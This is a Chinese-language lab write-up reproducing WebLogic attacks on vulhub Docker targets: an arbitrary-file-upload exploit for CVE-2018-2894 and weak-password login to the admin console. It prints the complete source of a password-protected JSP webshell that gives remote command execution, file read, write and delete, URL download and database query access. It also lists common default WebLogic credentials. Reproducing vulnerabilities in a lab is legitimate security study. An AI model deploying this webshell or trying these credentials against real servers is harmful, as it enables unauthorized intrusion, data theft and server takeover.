weblogic漏洞复现

weblogic

简介:

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中

img

初始页面

img

这里推荐一个批量扫描脚本工具

https://github.com/rabbitmask/WeblogicScan

CVE-2018-2894

环境搭建:

git clone https://github.com/vulhub/vulhub.git
cd vulhub-master/weblogic/CVE-2018-2894
docker-compose up -d #docker上部署,关闭docker后再次访问直接输入即可
docker ps #查看正在运行进程,发现其映射到7001端口
http://192.168.228.131:7001/console/ #访问7001,192.168.228.131是自己的主机名
docker-compose down #复现之后记得销毁靶场,开启另一个靶场前要销毁前一个靶场

img

docker-compose logs | grep password  #查看其密码为y9a03WHP

img

点击base_domain,点击advance处Enable Web Service Test Page,save保存

img

img

访问http://your-ip:7001/ws_utc/config.do,设置Work Home Dir为/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css。我将目录设置为ws_utc应用的静态文件css目录,访问这个目录是无需权限的,这一点很重要。

img

点击安全 -> 增加,然后上传1.jsp,进行bp抓包,我们可以发现时间戳1721315515880

img

上传1.jsp获取其shell

img

蚁剑连接

<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!
String Pwd = "Cknife";
String cs = "UTF-8";

String EC(String s) throws Exception {return new String(s.getBytes("ISO-8859-1"),cs);}

Connection GC(String s) throws Exception {
String[] x = s.trim().split("choraheiheihei");
Class.forName(x[0].trim());if(x[1].indexOf("jdbc:oracle")!=-1){return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);}else{
Connection c = DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);if (x.length > 4) {
c.setCatalog(x[4]);}return c;}}void AA(StringBuffer sb) throws Exception {
File k = new File("");
File r[] = k.listRoots();for (int i = 0; i < r.length; i++) {
sb.append(r[i].toString().substring(0, 2));}}void BB(String s, StringBuffer sb) throws Exception {
File oF = new File(s), l[] = oF.listFiles();
String sT, sQ, sF = "";
java.util.Date dt;
SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for (int i = 0; i < l.length; i++) {
dt = new java.util.Date(l[i].lastModified());
sT = fm.format(dt);
sQ = l[i].canRead() ? "R" : "";
sQ += l[i].canWrite() ? " W" : "";if (l[i].isDirectory()) {
sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ + "\n");} else {
sF+=l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"+ sQ + "\n";}}
sb.append(sF);}void EE(String s) throws Exception {
File f = new File(s);if (f.isDirectory()) {
File x[] = f.listFiles();for (int k = 0; k < x.length; k++) {if (!x[k].delete()) {EE(x[k].getPath());}}}
f.delete();}void FF(String s, HttpServletResponse r) throws Exception {
int n;
byte[] b = new byte[512];
r.reset();
ServletOutputStream os = r.getOutputStream();
BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));
os.write(("->" + "|").getBytes(), 0, 3);while ((n = is.read(b, 0, 512)) != -1) {
os.write(b, 0, n);}
os.write(("|" + "<-").getBytes(), 0, 3);
os.close();is.close();}void GG(String s, String d) throws Exception {
String h = "0123456789ABCDEF";
File f = new File(s);
f.createNewFile();
FileOutputStream os = new FileOutputStream(f);for (int i = 0; i < d.length(); i += 2) {
os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1))));}
os.close();}void HH(String s, String d) throws Exception {
File sf = new File(s), df = new File(d);if (sf.isDirectory()) {if (!df.exists()) {
df.mkdir();}
File z[] = sf.listFiles();for (int j = 0; j < z.length; j++) {HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());}} else {
FileInputStream is = new FileInputStream(sf);
FileOutputStream os = new FileOutputStream(df);
int n;
byte[] b = new byte[512];while ((n = is.read(b, 0, 512)) != -1) {
os.write(b, 0, n);}is.close();
os.close();}}void II(String s, String d) throws Exception {
File sf = new File(s), df = new File(d);
sf.renameTo(df);}void JJ(String s) throws Exception {
File f = new File(s);
f.mkdir();}void KK(String s, String t) throws Exception {
File f = new File(s);
SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
java.util.Date dt = fm.parse(t);
f.setLastModified(dt.getTime());}void LL(String s, String d) throws Exception {
URL u = new URL(s);
int n = 0;
FileOutputStream os = new FileOutputStream(d);
HttpURLConnection h = (HttpURLConnection) u.openConnection();
InputStream is = h.getInputStream();
byte[] b = new byte[512];while ((n = is.read(b)) != -1) {
os.write(b, 0, n);}
os.close();is.close();
h.disconnect();}void MM(InputStream is, StringBuffer sb) throws Exception {
String l;
BufferedReader br = new BufferedReader(new InputStreamReader(is));while ((l = br.readLine()) != null) {
sb.append(l + "\r\n");}}void NN(String s, StringBuffer sb) throws Exception {
Connection c = GC(s);
ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs();while (r.next()) {
sb.append(r.getString(1) + "\t|\t\r\n");}
r.close();
c.close();}void OO(String s, StringBuffer sb) throws Exception {
Connection c = GC(s);
String[] x = s.trim().split("choraheiheihei");
ResultSet r = c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null, "%", new String[]{"TABLE"});while (r.next()) {
sb.append(r.getString("TABLE_NAME") + "\t|\t\r\n");}
r.close();
c.close();}void PP(String s, StringBuffer sb) throws Exception {
String[] x = s.trim().split("\r\n");
Connection c = GC(s);
Statement m = c.createStatement(1005, 1007);
ResultSet r = m.executeQuery("select * from " + x[x.length-1]);
ResultSetMetaData d = r.getMetaData();for (int i = 1; i <= d.getColumnCount(); i++) {
sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)+ ")\t");}
r.close();
m.close();
c.close();}void QQ(String cs, String s, String q, StringBuffer sb,String p) throws Exception {
Connection c = GC(s);
Statement m = c.createStatement(1005, 1008);
BufferedWriter bw = null;try {
ResultSet r = m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q);
ResultSetMetaData d = r.getMetaData();
int n = d.getColumnCount();for (int i = 1; i <= n; i++) {
sb.append(d.getColumnName(i) + "\t|\t");}
sb.append("\r\n");if(q.indexOf("--f:")!=-1){
File file = new File(p);if(q.indexOf("-to:")==-1){
file.mkdir();}
bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:") + 4,q.length()).trim()),true),cs));}while (r.next()) {for (int i = 1; i <= n; i++) {if(q.indexOf("--f:")!=-1){
bw.write(r.getObject(i)+""+"\t");
bw.flush();}else{
sb.append(r.getObject(i)+"" + "\t|\t");}}if(bw!=null){bw.newLine();}
sb.append("\r\n");}
r.close();if(bw!=null){bw.close();}} catch (Exception e) {
sb.append("Result\t|\t\r\n");try {
m.executeUpdate(q);
sb.append("Execute Successfully!\t|\t\r\n");} catch (Exception ee) {
sb.append(ee.toString() + "\t|\t\r\n");}}
m.close();
c.close();}%><%//String Z = EC(request.getParameter(Pwd) + "", cs);

cs = request.getParameter("code") != null ? request.getParameter("code")+ "":cs;
request.setCharacterEncoding(cs);
response.setContentType("text/html;charset=" + cs);
StringBuffer sb = new StringBuffer("");if (request.getParameter(Pwd) != null) {try {
String Z = EC(request.getParameter("action") + "");
String z1 = EC(request.getParameter("z1") + "");
String z2 = EC(request.getParameter("z2") + "");
sb.append("->" + "|");
String s = request.getSession().getServletContext().getRealPath("/");if (Z.equals("A")) {
sb.append(s + "\t");if (!s.substring(0, 1).equals("/")) {AA(sb);}} else if (Z.equals("B")) {BB(z1, sb);} else if (Z.equals("C")) {
String l = "";
BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while ((l = br.readLine()) != null) {
sb.append(l + "\r\n");}
br.close();} else if (Z.equals("D")) {
BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
bw.write(z2);
bw.close();
sb.append("1");} else if (Z.equals("E")) {EE(z1);
sb.append("1");} else if (Z.equals("F")) {FF(z1, response);} else if (Z.equals("G")) {GG(z1, z2);
sb.append("1");} else if (Z.equals("H")) {HH(z1, z2);
sb.append("1");} else if (Z.equals("I")) {II(z1, z2);
sb.append("1");} else if (Z.equals("J")) {JJ(z1);
sb.append("1");} else if (Z.equals("K")) {KK(z1, z2);
sb.append("1");} else if (Z.equals("L")) {LL(z1, z2);
sb.append("1");} else if (Z.equals("M")) {
String[] c = { z1.substring(2), z1.substring(0, 2), z2 };
Process p = Runtime.getRuntime().exec(c);MM(p.getInputStream(), sb);MM(p.getErrorStream(), sb);} else if (Z.equals("N")) {NN(z1, sb);} else if (Z.equals("O")) {OO(z1, sb);} else if (Z.equals("P")) {PP(z1, sb);} else if (Z.equals("Q")) {QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\", "/")+"images/");}} catch (Exception e) {
sb.append("ERROR" + ":// " + e.toString());}
sb.append("|" + "<-");
out.print(sb.toString());}%>

weak_password

漏洞详情:由于管理员的疏忽,有可能会设置一些弱口令,攻击者可以通过常见的口令猜解进入后台,再通过后台getshell

访问后台地址http://your-ip:7001/console

常见的weblogic的口令

system:password
weblogic:weblogic
admin:secruity
joe:password
mary:password
system:sercurity
wlcsystem: wlcsystem
weblogic:Oracle@123

这里通过测试:weblogic:Oracle@123,成功登录

img